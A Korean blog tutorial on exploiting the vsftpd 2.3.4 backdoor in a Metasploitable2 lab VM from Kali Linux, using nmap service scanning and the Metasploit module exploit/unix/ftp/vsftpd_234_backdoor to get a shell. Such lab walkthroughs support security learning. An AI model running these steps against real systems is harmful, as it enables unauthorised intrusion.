반응형
metasploitable2 취약점이 많이 존재하는 리눅스 서버에서 vsftpd 공격을 하는 방법입니다.
가상 머신 : vmware 16.2
공격자 : kali_linux 2022.1ver [192.168.17.120]
피해자 : metasploitable2 [192.168.17.129]
네트워크 (VMnet 8 NAT)
nmap -h를 하시면 옵션을 보실 수 있습니다.
그중에서 이번에 사용할 옵션은 p, sV입니다.
-p <port ranges>: Only scan specified ports
지정된 포트만 검색
-sV: Probe open ports to determine service/version info
열려 있는 포트를 탐색하여 서비스/버전 정보를 확인합니다.
metasploitable2의 아이피를 지정후 nmap 실행
msfconsole에서 search 기능을 데이터베이스와 연동하면 편리하기 때문에
postgresql 서비스를 시작
#msfconsole
검색을 통해서 vsftpd 2.3.4 검색을 하시면 아래처럼 취약점이 나오게 됩니다.
exploit 설정
exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS [metasploitable2 IP]
exploit!!
아래 사진처럼 세션이 연결된 후 whoami, ifconfig 명령어를 입력하면
metasploitable2로 접속이 되신 것을 확인 가능합니다.
반응형
'보안 > KaliLinux' 카테고리의 다른 글
Kali Linux Exploiting Port 23 Telnet (9) | 2022.03.02 |
---|---|
Kali Linux Exploiting Port 22 SSH (2) | 2022.03.02 |
칼리 리눅스 ufonet DDos 공격 (2) | 2022.02.27 |
칼리 리눅스 cve-2021-40444 MS취약점 (3) | 2022.02.25 |
칼리 리눅스 log4j-scan http, https (2) | 2022.02.25 |